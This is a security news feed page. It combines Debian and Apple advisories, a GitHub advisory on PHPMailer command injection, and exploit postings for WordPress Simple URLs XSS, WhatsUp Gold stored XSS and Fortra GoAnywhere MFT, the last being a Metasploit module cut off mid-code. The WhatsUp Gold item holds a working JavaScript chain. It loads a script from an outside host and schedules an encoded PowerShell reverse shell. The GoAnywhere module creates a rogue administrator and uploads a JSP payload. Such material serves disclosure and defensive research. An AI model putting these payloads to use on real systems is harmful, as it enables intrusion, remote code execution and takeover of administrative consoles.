Debian Linux Security Advisory 5615-1 - It was discovered that runc, a command line client for running applications packaged according to the Open Container Format (OCF), was susceptible to multiple container break-outs due to an internal file descriptor leak.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5615-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 04, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : runcCVE ID         : CVE-2024-21626It was discovered that runc, a command line client for runningapplications packaged according to the Open Container Format (OCF), wassuspectible to multiple container breakouts due to an internal filedescriptor leak.For the oldstable distribution (bullseye), this problem has been fixedin version 1.0.0~rc93+ds1-5+deb11u3.For the stable distribution (bookworm), this problem has been fixed inversion 1.1.5+ds1-1+deb12u1.We recommend that you upgrade your runc packages.For the detailed security status of runc please refer toits security tracker page at:https://security-tracker.debian.org/tracker/runcFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW/2/oACgkQEMKTtsN8TjbbzxAAh2354+lngRRQ7hLtEYgFa8SrkJmgIAMPvR5S1fNWh60wOdUG1690QuzxQm19ZpcF/QJFw6yefECYHWMzmqBJiv2WNadGOT7S9YqZ+ILz/ohwA+1HjH92F/Xl5BTA+Rg9O2hTSqGdDUB8qPpz0/mBin89m1B0y6xpLgF2C/3NiNkOeiuSmVcMsAc/h64VovNPuRGz3/VcPPyO85avjL6ZXEA9L48dPoliTzonNOk+DRgYb4YsFTP1T0RcyrchTLljMkCx2l8gVWKD0BLtH8wDO12kOAlAtnPN9ufB9FXfe9axobvOYalYzOca5/kvRVZ246GwyUG+OM9y01AJsZzKMHnqcT8T3q27FRGu9OFYMN0gONnTLiwEYrjxonzBApm0OPg5XqflRTxVL154tIQi9jmyxGDsHdRmtBCeQw2B7bvoX/bpFijcjvP3FLSWkKmduGocrYm4FgnwiYgh4714fo56HZG4x9u+Y4iplPQWlnv9dEVAzw/oUGr+z0s1TJLfZYEZSpmju2e7afiZbRHdB7YBx8wj02R7yIJJF2sF3tk5eo2UpRJzBSwaolek8b4PcQBsT5h8UAmT0z6WhSFOXwjhmkMD61OFUoPEmWlXJz9VbbWuqmd4R23iYq3r9nkaieQutrbc+i7EXMUT42ogZgOFBG1mQPXeL8PECXfnazs==H2CG-----END PGP SIGNATURE-----

Debian Security Advisory 5615-1

Debian Linux Security Advisory 5614-1 - Two vulnerabilities were discovered in zbar, a library for scanning and decoding QR and bar codes, which may result in denial of service, information disclosure or potentially the execution of arbitrary code if a specially crafted code is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5614-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 03, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : zbarCVE ID         : CVE-2023-40889 CVE-2023-40890Debian Bug     : 1051724Two vulnerabilities were discovered in zbar, a library for scanning anddecoding QR and bar codes, which may result in denial of service,information disclosure or potentially the execution of arbitrary code ifa specially crafted code is processed.For the oldstable distribution (bullseye), these problems have beenfixed in version 0.23.90-1+deb11u1.For the stable distribution (bookworm), these problems have been fixedin version 0.23.92-7+deb12u1.We recommend that you upgrade your zbar packages.For the detailed security status of zbar please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/zbarFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW+cM5fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RZEQ/+LBd+YadiS/TNfrBy9lYnugnavklh9VSEkO+sKYFVzkq/ypQwuaLA0MaIt0OOIGIrwDVXL0/Lb6Rjuo96PGQX6NJXF2iG7UUD8RjiJDHIFPUP9nbWOjXmNAdtnfUvF9AwyExSpCREhXc2PTDc5lmnAu56NWrJRN53RqngbYSxILoOpNRBDlZUEL3RNrbpPvpQnvIBo2JcmaT/PtgC+U5bxKfnQGQ2Cree/nyq8de9VCPwGeTczqFz8I3NsklG9k8/09+zdJOUpy+KVi+ylTAG/f/ydzGtrFyr++hPU692PIGeu++N3yNX1mP9KWhsAdkfL581RauwKRgHFnRXK/yUDg7rDUlMRd0w5QphDkL+01mjzgiooGBp5I7OGXvdVgribWdexRiKE0nfzf6sHxzbHXRdCOiPWhGAf5w6ORdpgRwuICo4mWTw1T8GJktFfuLXP7uRIdVIMeIVVVLfFYBQeTr8g7A0TV1ysAzG+yjHVhfYJxTVS9rTNmt8MJbO6ZBgWnMdMbd+4xlngWMpxDOInhdFBTmbyBdWnbMOQDZhgXLy0Hd0VF96UoQkWoHxphpbioY5on053jSsU6FH0r1bSm5rjOfCkRVLalCTjZyY4TqCSmbTlq3qyxUHgT9ws2M+//SpJKzwGvVXN8+0M3BzVXUGJYmLG0v0/+jb58wUBUA==OOtS-----END PGP SIGNATURE-----

Debian Security Advisory 5614-1

Apple Security Advisory 02-02-2024-1 - visionOS 1.0.2 addresses a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-02-02-2024-1 visionOS 1.0.2

visionOS 1.0.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214070.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to   
arbitrary code execution. Apple is aware of a report that this issue   
may have been exploited.  
Description: A type confusion issue was addressed with improved  
checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

Instructions on how to update visionOS are available  
at https://support.apple.com/HT214009 To check the software   
version on your Apple Vision Pro, open the Settings app and choose   
General > About.

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmW9aewACgkQX+5d1TXa  
IvrZNxAAlUqs8RDuCeo/N9dUGSvXociXTXDrbhZzKZeQ+RQjLNnW9fyUailHNcMM  
a2Udpkty1/eDQIWgZxTl8ftcBycxeEsatn29UpYaWNsRLuYPInTKr8LCdv4evUJm  
KTnW4xyprG5hKbiVKV17inpxLwF0YyziC5ZTa670f1POT9B7tYRvlj0rvp8OK9+V  
Gh/9gEKEwwhvc7DnwvtxIJsNZf0TPcRtjNBYxgXEghT8+a5H3dERVWiMyLepAh8X  
Vrf5Hfy0SI792u53LIvN8zP2nLuQr3Sw0ZxxJsUOGNWmyg1SoF2jmAh56Ksh/MbV  
fS4EhyfaZTSR4YycFZtuUozAoFiZ+Sk62xTTZGV64DxGvVu6Vr0gOp4K65fNy1QU  
L6nkwc89G1TSHdbVlCLtP8VZYFpFlAOmtYklb7e0oGYYrY5QZmQoXoTMmcK/sTcJ  
+mBsfHU+zXOXRDQ+XSg/JLtlUy5+jV8JOnT46At+sueVvnRvOyg12Wjuo4dzuzNh  
1zDVnmfVRnRRmT6ZXHlTEMcaTmnCk73jZEP00maem6DGHYCjcVAW8MqK3IcHv79U  
YKQ+t14ooVbskTPdDHrAzznK3nUQNkC8FytW8Z3bNhdpl1yMKyFJPYROPxRMTJQN  
vhZ4nKx1Lz3yaCJsH3dkuKOLvggM9vz/oa3Qv8NKh1loShhj0JU=  
=pJSu  
-----END PGP SIGNATURE-----

Apple Security Advisory 02-02-2024-1

WordPress Simple URLs plugin versions prior to 115 suffer from a cross site scripting vulnerability.

    # Exploit Title: simple urls < 115  XSS# Google Dork:# Exploit Author: AmirZargham# Vendor Homepage: https://getlasso.co/# Software Link: https://wordpress.org/plugins/simple-urls/# Version: < 115# Tested on: firefox,chrome# CVE: CVE-2023-0099# CWE: CWE-79# Platform: MULTIPLE# Type: WebAppsDescriptionThe Simple URLs WordPress plugin before 115 does not sanitise and escapesome parameters before outputting them back in some pages, leading toReflected Cross-Site Scripting.Usage Info:send malicious link to victim:https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=<script>alert(origin)</script>

WordPress Simple URLs Cross Site Scripting

WhatsUp Gold 2022 version 22.1.0 Build 39 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)# Date: April 18, 2023# Exploit Author: Andreas Finstad (4ndr34z)# Vendor Homepage: https://www.whatsupgold.com# Version: v.22.1.0 Build 39# Tested on: Windows 2022 Server# CVE : CVE-2023-35759# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter.Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)Product Name: WhatsUp Gold 2022Version: 22.1.0 Build 39Vulnerability Type: Stored Cross-Site Scripting (XSS)Description:WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)The XSS trigger when clicking the "All names and addresses"Stage:Base64 encoded id property:var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);Staged payload placed in the SNMP sysName Field on a device:<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>payload:var vhost = window.location.protocol+'\/\/'+window.location.hostaddaction();async function addaction() {var arguments = ''let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '1902',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'Accept': 'application/json',        'Content-Type': 'application/json',        'X-Requested-With': 'XMLHttpRequest',        'sec-ch-ua-mobile': '?0',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'sec-ch-ua-platform': '"macOS"',        'Sec-Fetch-Mode': 'cors',        'Sec-Fetch-Dest': 'empty',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'});setTimeout(() => { getactions(); }, 1000);};async function getactions() {const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{    method: 'GET',    headers: {        'Connection': 'close',         'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',         'Accept': 'application/json',         'Content-Type': 'application/json',         'X-Requested-With': 'XMLHttpRequest',         'sec-ch-ua-mobile': '?0',         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',         'sec-ch-ua-platform': '"macOS"',         'Sec-Fetch-Site': 'same-origin',         'Sec-Fetch-Mode': 'cors',         'Sec-Fetch-Dest': 'empty',         'Accept-Encoding': 'gzip, deflate',         'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include'   });const actions = await response.json();var results = [];var searchField = "Name";var searchVal = "Systemtask";for (var i=0 ; i < actions.length ; i++){    if (actions[i][searchField] == searchVal) {        results.push(actions[i].Id);        revshell(results[0])           }}//console.log(actions);};async function revshell(ID) {fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '2442',        'Cache-Control': 'max-age=0',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'sec-ch-ua-mobile': '?0',        'sec-ch-ua-platform': '"macOS"',        'Upgrade-Insecure-Requests': '1',        'Origin': 'https://192.168.16.100',        'Content-Type': 'application/x-www-form-urlencoded',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',        'Sec-Fetch-Site': 'same-origin',        'Sec-Fetch-Mode': 'navigate',        'Sec-Fetch-User': '?1',        'Sec-Fetch-Dest': 'iframe',        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'});};

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

PHPMailer before 1.7.4, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in `class.phpmailer.php`.

### Impact
Shell command injection, remotely exploitable if host application does not filter user data appropriately.

### Patches
Fixed in 1.7.4

### Workarounds
Filter and validate user-supplied data before putting in the into the `Sender` property.

### References
https://nvd.nist.gov/vuln/detail/CVE-2007-3215

### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)

**Package**

composer phpmailer/phpmailer (Composer)

**Affected versions**

< 1.7.4

**Patched versions**

1.7.4

**Description**

PHPMailer before 1.7.4, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in class.phpmailer.php.

**Impact**

Shell command injection, remotely exploitable if host application does not filter user data appropriately.

**Patches**

Fixed in 1.7.4

**Workarounds**

Filter and validate user-supplied data before putting in the into the Sender property.

**References**

https://nvd.nist.gov/vuln/detail/CVE-2007-3215

**For more information**

If you have any questions or comments about this advisory:

*   Open a private issue in the PHPMailer project

**References**

*   GHSA-6h78-85v2-mmch
*   https://cxsecurity.com/issue/WLB-2007060063
*   https://exchange.xforce.ibmcloud.com/vulnerabilities/34818
*   https://seclists.org/fulldisclosure/2011/Oct/223
*   https://sourceforge.net/p/phpmailer/bugs/192/
*   https://web.archive.org/web/20070714054359/http://larholm.com/2007/06/11/phpmailer-0day-remote-execution/
*   https://yehg.net/lab/pr0js/advisories/%5BvTiger\_5.2.1%5D\_rce

 Synchro published to PHPMailer/PHPMailer

Mar 5, 2020

Published to the GitHub Advisory Database

Feb 2, 2024

Reviewed

Feb 2, 2024

Last updated

Feb 2, 2024

GHSA-6h78-85v2-mmch: PHPMailer Shell command injection

This Metasploit module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to          create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere          MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'James Horseman', # Original auth bypass PoC/Analysis          'Zach Hanley' # Original auth bypass PoC/Analysis        ],        'References' => [          ['CVE', '2024-0204'],          ['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory          ['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/']        ],        'DisclosureDate' => '2024-01-22',        'Platform' => %w[linux win],        'Arch' => [ARCH_JAVA],        'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux.        'Targets' => [          [            # Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp            'Automatic', {}          ],          [            'Linux',            {              'Platform' => 'linux',              'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere'            }          ],          [            'Windows',            {              'Platform' => 'win',              'GOANYWHERE_INSTALL_PATH' => 'C:\\Program Files\\Fortra\\GoAnywhere\\'            },          ],        ],        'DefaultOptions' => {          'RPORT' => 8001,          'SSL' => true        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            # A new admin account is created, which the exploit can't destroy.            CONFIG_CHANGES,            # The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them.            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']),      ]    )  end  def check    # We can query an undocumented unauthenticated REST API endpoint and pull the version number.    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system')    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200    json_data = res.get_json_document    product = json_data.dig('data', 'product')    version = json_data.dig('data', 'version')    return CheckCode::Unknown('No version information in response') if product.nil? || version.nil?    # As per the Fortra advisory, the following version are affected:    # * Fortra GoAnywhere MFT 6.x from 6.0.1    # * Fortra GoAnywhere MFT 7.x before 7.4.1    # This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable.    if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))      return CheckCode::Appears("#{product} #{version}")    end    Exploit::CheckCode::Safe("#{product} #{version}")  end  def exploit    # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So    # we generate the username/password pair we want to use.    # Note: We cannot delete the administrator account that we create.    admin_username = Rex::Text.rand_text_alpha_lower(8)    admin_password = Rex::Text.rand_text_alphanumeric(16)    # By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to    # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double    # dot path segment, we need a directory to navigate down from, there are many available on the target so we pick    # a random one that we know works.    path_segments = %w[styles fonts auth help]    path_segment = path_segments.sample    # This is CVE-2024-0204...    initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),        'j_id_u:creteAdminGrid:username' => admin_username,        'j_id_u:creteAdminGrid:password' => admin_password,        'j_id_u:creteAdminGrid:password_hinput' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,        'j_id_u:creteAdminGrid:submitButton' => '',        'createAdminForm_SUBMIT' => 1      }    )    # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method    # loginNewAdminUser and update our current session, so we dont need to manually login.    unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')      fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")    end    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")    store_credentials(admin_username, admin_password)    # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.    if target.name == 'Automatic'      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'),        'keep_cookies' => true      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml')      end      # The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using      # the Java system property "os.name".      os_match = res.body.match(%r{<span id="AboutForm:\S+:OSName">(.+)</span>})      unless os_match        fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml')      end      # To perform the JSP payload upload, we need to know the product installation path.      install_match = res.body.match(%r{<span id="AboutForm:\S+:goAnywhereHome">(.+)</span>})      unless install_match        fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml')      end      # Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere.      found_target = targets.find do |t|        os_match[1].downcase.include? t.name.downcase      end      unless found_target        fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'")      end      # Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below.      detected_target = found_target.dup      detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1]      print_status("Automatic targeting, detected OS: #{detected_target.name}")      print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}")    else      detected_target = target    end    # We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then    # change to the directory we want to upload to, then upload the file.    path_separator = detected_target['Platform'] == 'win' ? '\\' : '/'    # We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp    adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH']    adminroot_path += path_separator unless adminroot_path.end_with? path_separator    adminroot_path += 'adminroot'    adminroot_path += path_separator    viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'j_id_4u:j_id_4v:newPath_focus' => '',        'j_id_4u:j_id_4v:newPath_input' => '/',        'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path,        'j_id_4u:j_id_4v:NewPathButton' => '',        'j_id_4u_SUBMIT' => 1      